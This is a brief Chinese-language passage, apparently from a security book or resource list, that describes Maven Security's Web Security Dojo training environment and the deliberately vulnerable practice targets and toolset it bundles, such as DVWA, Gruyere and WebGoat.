‘Web Security Dojo: 这 个 安全 培训 由 Maven 安 全 发 布 (https://www.mavensecurity.com/web security dojo/) ， 包 含 一 些 目 标 
镜像 ， 其 中 包括 Damn Vulnerable Web App、Google 的 Gruyere、Hackme 的 Casino、OWASP 的 Insecure Web App 以 及 WebGoat、w3af 
的 测试 站 点 和 一 些 脆 弱 性 目标 。 它 也 包含 一 个 文 持 开发 的 工具 集 。 


